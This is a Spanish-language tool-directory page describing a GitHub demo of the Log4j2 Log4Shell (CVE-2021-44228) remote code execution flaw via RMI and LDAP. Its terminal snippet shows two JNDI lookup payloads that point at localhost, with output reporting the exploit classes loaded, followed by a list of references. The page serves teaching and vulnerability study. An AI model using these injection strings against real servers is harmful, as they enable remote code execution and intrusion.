Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-Demo — Demo de RCE de Apache Log4j2 CVE-2021-44228 con RMI y LDAP | Kitploit
Herramientas/GitHubGitHub/mzlogin/cve-2021-44228-demo
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubmzlogin/cve-2021-44228-demo

CVE-2021-44228-Demo

Demo de RCE de Apache Log4j2 CVE-2021-44228 con RMI y LDAP

Ver Repositorio
23hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228-Demo

Ejemplo de inyección remota de código a través de CVE-2021-44228 utilizando RMI y LDAP.

root@kitploit:~
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

RmiServer y LdapServer requieren Python3 para ejecutarse.

Referencias

  • Reproducción de la vulnerabilidad de ejecución remota de código en Apache Log4j2
  • ¡Vulnerabilidad crítica de Log4j! ¡Análisis detallado de las causas! ¡Primero en toda la red! y ¡Vulnerabilidad crítica de Log4j! (Video complementario)
  • Log4j Lookups
  • Apache Log4j2 desde RCE hasta bypass de RC1
  • tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
  • PSA: Log4Shell and the current state of JNDI injection
Descargar herramienta